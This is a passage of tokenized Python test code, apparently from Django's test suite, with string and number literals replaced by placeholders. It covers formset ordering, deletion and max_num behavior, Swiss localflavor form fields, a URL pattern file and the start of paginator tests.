forms ] , [ { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : u'<STR_LIT>' } , { } , { } ] ) <EOL> def test_second_form_partially_filled_2 ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ChoiceFormSet = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . errors , [ { } , { '<STR_LIT>' : [ u'<STR_LIT>' ] } , { } ] ) <EOL> def test_more_initial_data ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> initial = [ { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } ] <EOL> ChoiceFormSet = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> self . assertTrue ( formset . empty_form . empty_permitted ) <EOL> self . assertHTMLEqual ( formset . empty_form . 
as_ul ( ) , """<STR_LIT>""" ) <EOL> def test_formset_with_deletion ( self ) : <EOL> ChoiceFormSet = formset_factory ( Choice , can_delete = True ) <EOL> initial = [ { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } , { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } ] <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . forms ] , [ { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : False , '<STR_LIT>' : u'<STR_LIT>' } , { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True , '<STR_LIT>' : u'<STR_LIT>' } , { } ] ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . 
deleted_forms ] , [ { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True , '<STR_LIT>' : u'<STR_LIT>' } ] ) <EOL> class CheckForm ( Form ) : <EOL> field = IntegerField ( min_value = <NUM_LIT:100> ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> CheckFormSet = formset_factory ( CheckForm , can_delete = True ) <EOL> formset = CheckFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> formset = CheckFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> class Person ( Form ) : <EOL> name = CharField ( ) <EOL> PeopleForm = formset_factory ( <EOL> form = Person , <EOL> can_delete = True ) <EOL> p = PeopleForm ( <EOL> { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> self . assertTrue ( p . is_valid ( ) ) <EOL> self . assertEqual ( len ( p . deleted_forms ) , <NUM_LIT:1> ) <EOL> def test_formsets_with_ordering ( self ) : <EOL> ChoiceFormSet = formset_factory ( Choice , can_order = True ) <EOL> initial = [ { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } , { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } ] <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . 
join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> form_output = [ ] <EOL> for form in formset . ordered_forms : <EOL> form_output . append ( form . cleaned_data ) <EOL> self . assertEqual ( form_output , [ <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> ] ) <EOL> def test_empty_ordered_fields ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ChoiceFormSet = formset_factory ( Choice , can_order = True ) <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> form_output = [ ] <EOL> for form in formset . ordered_forms : <EOL> form_output . append ( form . cleaned_data ) <EOL> self . 
assertEqual ( form_output , [ <EOL> { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : None , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:50> , '<STR_LIT>' : None , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> ] ) <EOL> def test_ordering_blank_fieldsets ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> ChoiceFormSet = formset_factory ( Choice , can_order = True ) <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> form_output = [ ] <EOL> for form in formset . ordered_forms : <EOL> form_output . append ( form . cleaned_data ) <EOL> self . assertEqual ( form_output , [ ] ) <EOL> def test_formset_with_ordering_and_deletion ( self ) : <EOL> ChoiceFormSet = formset_factory ( Choice , can_order = True , can_delete = True ) <EOL> initial = [ <EOL> { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:100> } , <EOL> { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } , <EOL> { '<STR_LIT>' : u'<STR_LIT>' , '<STR_LIT>' : <NUM_LIT> } , <EOL> ] <EOL> formset = ChoiceFormSet ( initial = initial , auto_id = False , prefix = '<STR_LIT>' ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( form . as_ul ( ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . 
join ( form_output ) , """<STR_LIT>""" ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> form_output = [ ] <EOL> for form in formset . ordered_forms : <EOL> form_output . append ( form . cleaned_data ) <EOL> self . assertEqual ( form_output , [ <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : False , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:100> , '<STR_LIT>' : False , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : u'<STR_LIT>' } , <EOL> ] ) <EOL> self . assertEqual ( [ form . cleaned_data for form in formset . deleted_forms ] , [ { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True , '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : u'<STR_LIT>' } ] ) <EOL> def test_invalid_deleted_form_with_ordering ( self ) : <EOL> class Person ( Form ) : <EOL> name = CharField ( ) <EOL> PeopleForm = formset_factory ( form = Person , can_delete = True , can_order = True ) <EOL> p = PeopleForm ( { <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } ) <EOL> self . assertTrue ( p . is_valid ( ) ) <EOL> self . assertEqual ( p . 
ordered_forms , [ ] ) <EOL> def test_clean_hook ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FavoriteDrinksFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> for error in formset . non_form_errors ( ) : <EOL> self . assertEqual ( str ( error ) , '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FavoriteDrinksFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . non_form_errors ( ) , [ ] ) <EOL> def test_limiting_max_forms ( self ) : <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:3> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:3> , max_num = <NUM_LIT:0> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertEqual ( '<STR_LIT:\n>' . join ( form_output ) , "<STR_LIT>" ) <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:5> , max_num = <NUM_LIT:2> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . 
join ( form_output ) , """<STR_LIT>""" ) <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:1> , max_num = <NUM_LIT:2> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> def test_max_num_with_initial_data ( self ) : <EOL> initial = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:1> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( initial = initial ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> def test_max_num_zero ( self ) : <EOL> initial = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:1> , max_num = <NUM_LIT:0> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( initial = initial ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertEqual ( '<STR_LIT:\n>' . join ( form_output ) , "<STR_LIT>" ) <EOL> def test_more_initial_than_max_num ( self ) : <EOL> initial = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:1> , max_num = <NUM_LIT:2> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( initial = initial ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . 
join ( form_output ) , """<STR_LIT>""" ) <EOL> initial = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> ] <EOL> LimitedFavoriteDrinkFormSet = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:3> , max_num = <NUM_LIT:2> ) <EOL> formset = LimitedFavoriteDrinkFormSet ( initial = initial ) <EOL> form_output = [ ] <EOL> for form in formset . forms : <EOL> form_output . append ( str ( form ) ) <EOL> self . assertHTMLEqual ( '<STR_LIT:\n>' . join ( form_output ) , """<STR_LIT>""" ) <EOL> def test_regression_6926 ( self ) : <EOL> formset = FavoriteDrinksFormSet ( ) <EOL> self . assertEqual ( formset . management_form . prefix , '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> formset = FavoriteDrinksFormSet ( data = data ) <EOL> self . assertEqual ( formset . management_form . prefix , '<STR_LIT>' ) <EOL> formset = FavoriteDrinksFormSet ( initial = { } ) <EOL> self . assertEqual ( formset . management_form . prefix , '<STR_LIT>' ) <EOL> def test_regression_12878 ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> formset = FavoriteDrinksFormSet ( data , prefix = '<STR_LIT>' ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( formset . non_form_errors ( ) , [ u'<STR_LIT>' ] ) <EOL> def test_formset_iteration ( self ) : <EOL> ChoiceFormset = formset_factory ( Choice , extra = <NUM_LIT:3> ) <EOL> formset = ChoiceFormset ( ) <EOL> forms = list ( formset ) <EOL> self . assertEqual ( forms , formset . forms ) <EOL> self . assertEqual ( len ( formset ) , len ( forms ) ) <EOL> self . assertEqual ( formset [ <NUM_LIT:0> ] , forms [ <NUM_LIT:0> ] ) <EOL> try : <EOL> formset [ <NUM_LIT:3> ] <EOL> self . 
fail ( '<STR_LIT>' ) <EOL> except IndexError : <EOL> pass <EOL> class BaseReverseFormSet ( BaseFormSet ) : <EOL> def __iter__ ( self ) : <EOL> return reversed ( self . forms ) <EOL> def __getitem__ ( self , idx ) : <EOL> return super ( BaseReverseFormSet , self ) . __getitem__ ( len ( self ) - idx - <NUM_LIT:1> ) <EOL> ReverseChoiceFormset = formset_factory ( Choice , BaseReverseFormSet , extra = <NUM_LIT:3> ) <EOL> reverse_formset = ReverseChoiceFormset ( ) <EOL> self . assertEqual ( str ( reverse_formset [ <NUM_LIT:0> ] ) , str ( forms [ - <NUM_LIT:1> ] ) ) <EOL> self . assertEqual ( str ( reverse_formset [ <NUM_LIT:1> ] ) , str ( forms [ - <NUM_LIT:2> ] ) ) <EOL> self . assertEqual ( len ( reverse_formset ) , len ( forms ) ) <EOL> def test_formset_nonzero ( self ) : <EOL> """<STR_LIT>""" <EOL> ChoiceFormset = formset_factory ( Choice , extra = <NUM_LIT:0> ) <EOL> formset = ChoiceFormset ( ) <EOL> self . assertEqual ( len ( formset . forms ) , <NUM_LIT:0> ) <EOL> self . assertTrue ( formset ) <EOL> data = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> } <EOL> class Choice ( Form ) : <EOL> choice = CharField ( ) <EOL> votes = IntegerField ( ) <EOL> ChoiceFormSet = formset_factory ( Choice ) <EOL> class FormsetAsFooTests ( TestCase ) : <EOL> def test_as_table ( self ) : <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . as_table ( ) , """<STR_LIT>""" ) <EOL> def test_as_p ( self ) : <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . as_p ( ) , """<STR_LIT>""" ) <EOL> def test_as_ul ( self ) : <EOL> formset = ChoiceFormSet ( data , auto_id = False , prefix = '<STR_LIT>' ) <EOL> self . assertHTMLEqual ( formset . 
as_ul ( ) , """<STR_LIT>""" ) <EOL> class ArticleForm ( Form ) : <EOL> title = CharField ( ) <EOL> pub_date = DateField ( ) <EOL> ArticleFormSet = formset_factory ( ArticleForm ) <EOL> class TestIsBoundBehavior ( TestCase ) : <EOL> def test_no_data_raises_validation_error ( self ) : <EOL> self . assertRaises ( ValidationError , ArticleFormSet , { } ) <EOL> def test_with_management_data_attrs_work_fine ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : u'<STR_LIT:1>' , <EOL> '<STR_LIT>' : u'<STR_LIT:0>' , <EOL> } <EOL> formset = ArticleFormSet ( data ) <EOL> self . assertEqual ( <NUM_LIT:0> , formset . initial_form_count ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , formset . total_form_count ( ) ) <EOL> self . assertTrue ( formset . is_bound ) <EOL> self . assertTrue ( formset . forms [ <NUM_LIT:0> ] . is_bound ) <EOL> self . assertTrue ( formset . is_valid ( ) ) <EOL> self . assertTrue ( formset . forms [ <NUM_LIT:0> ] . is_valid ( ) ) <EOL> self . assertEqual ( [ { } ] , formset . cleaned_data ) <EOL> def test_form_errors_are_cought_by_formset ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : u'<STR_LIT:2>' , <EOL> '<STR_LIT>' : u'<STR_LIT:0>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> formset = ArticleFormSet ( data ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertEqual ( [ { } , { '<STR_LIT>' : [ u'<STR_LIT>' ] } ] , formset . errors ) <EOL> def test_empty_forms_are_unbound ( self ) : <EOL> data = { <EOL> '<STR_LIT>' : u'<STR_LIT:1>' , <EOL> '<STR_LIT>' : u'<STR_LIT:0>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> } <EOL> unbound_formset = ArticleFormSet ( ) <EOL> bound_formset = ArticleFormSet ( data ) <EOL> empty_forms = [ ] <EOL> empty_forms . append ( unbound_formset . empty_form ) <EOL> empty_forms . append ( bound_formset . empty_form ) <EOL> self . assertFalse ( empty_forms [ <NUM_LIT:0> ] . 
is_bound ) <EOL> self . assertFalse ( empty_forms [ <NUM_LIT:1> ] . is_bound ) <EOL> self . assertHTMLEqual ( empty_forms [ <NUM_LIT:0> ] . as_p ( ) , empty_forms [ <NUM_LIT:1> ] . as_p ( ) ) <EOL> class TestEmptyFormSet ( TestCase ) : <EOL> "<STR_LIT>" <EOL> def test_empty_formset_is_valid ( self ) : <EOL> EmptyFsetWontValidateFormset = formset_factory ( FavoriteDrinkForm , extra = <NUM_LIT:0> , formset = EmptyFsetWontValidate ) <EOL> formset = EmptyFsetWontValidateFormset ( data = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:0>' } , prefix = "<STR_LIT>" ) <EOL> formset2 = EmptyFsetWontValidateFormset ( data = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT>' } , prefix = "<STR_LIT>" ) <EOL> self . assertFalse ( formset . is_valid ( ) ) <EOL> self . assertFalse ( formset2 . is_valid ( ) ) </s>
<s> from django . contrib . localflavor . ch . forms import ( CHZipCodeField , <EOL> CHPhoneNumberField , CHIdentityCardNumberField , CHStateSelect ) <EOL> from django . test import SimpleTestCase <EOL> class CHLocalFlavorTests ( SimpleTestCase ) : <EOL> def test_CHStateSelect ( self ) : <EOL> f = CHStateSelect ( ) <EOL> out = u'''<STR_LIT>''' <EOL> self . assertHTMLEqual ( f . render ( '<STR_LIT:state>' , '<STR_LIT>' ) , out ) <EOL> def test_CHZipCodeField ( self ) : <EOL> error_format = [ u'<STR_LIT>' ] <EOL> valid = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> invalid = { <EOL> '<STR_LIT>' : error_format , <EOL> '<STR_LIT>' : error_format , <EOL> } <EOL> self . assertFieldOutput ( CHZipCodeField , valid , invalid ) <EOL> def test_CHPhoneNumberField ( self ) : <EOL> error_format = [ u'<STR_LIT>' ] <EOL> valid = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> invalid = { <EOL> '<STR_LIT>' : error_format , <EOL> '<STR_LIT>' : error_format , <EOL> } <EOL> self . assertFieldOutput ( CHPhoneNumberField , valid , invalid ) <EOL> def test_CHIdentityCardNumberField ( self ) : <EOL> error_format = [ u'<STR_LIT>' ] <EOL> valid = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> invalid = { <EOL> '<STR_LIT>' : error_format , <EOL> '<STR_LIT>' : error_format , <EOL> } <EOL> self . assertFieldOutput ( CHIdentityCardNumberField , valid , invalid ) </s>
<s> from django . conf . urls import patterns <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) </s>
<s> from django . core . paginator import Paginator , EmptyPage , PageNotAnInteger <EOL> from django . utils . unittest import TestCase <EOL> class PaginatorTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def check_paginator ( self , params , output ) : <EOL> """<STR_LIT>""" <EOL> count , num_pages , page_range = output <EOL> paginator = Paginator ( * params ) <EOL> self . check_attribute ( '<STR_LIT:count>' , paginator , count , params ) <EOL> self . check_attribute ( '<STR_LIT>' , paginator , num_pages , params ) <EOL> self . check_attribute ( '<STR_LIT>' , paginator , page_range , params ) <EOL> def check_attribute ( self , name , paginator , expected , params ) : <EOL> """<STR_LIT>""" <EOL> got = getattr ( paginator , name ) <EOL> self . assertEqual ( expected , got , <EOL> "<STR_LIT>" <EOL> % ( name , expected , got , params ) ) <EOL> def test_invalid_page_number ( self ) : <EOL> """<STR_LIT>""" <EOL> paginator = Paginator ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <NUM_LIT:2> ) <EOL> self . assertRaises ( PageNotAnInteger , paginator . validate_number , None ) <EOL> self . assertRaises ( PageNotAnInteger , paginator . 
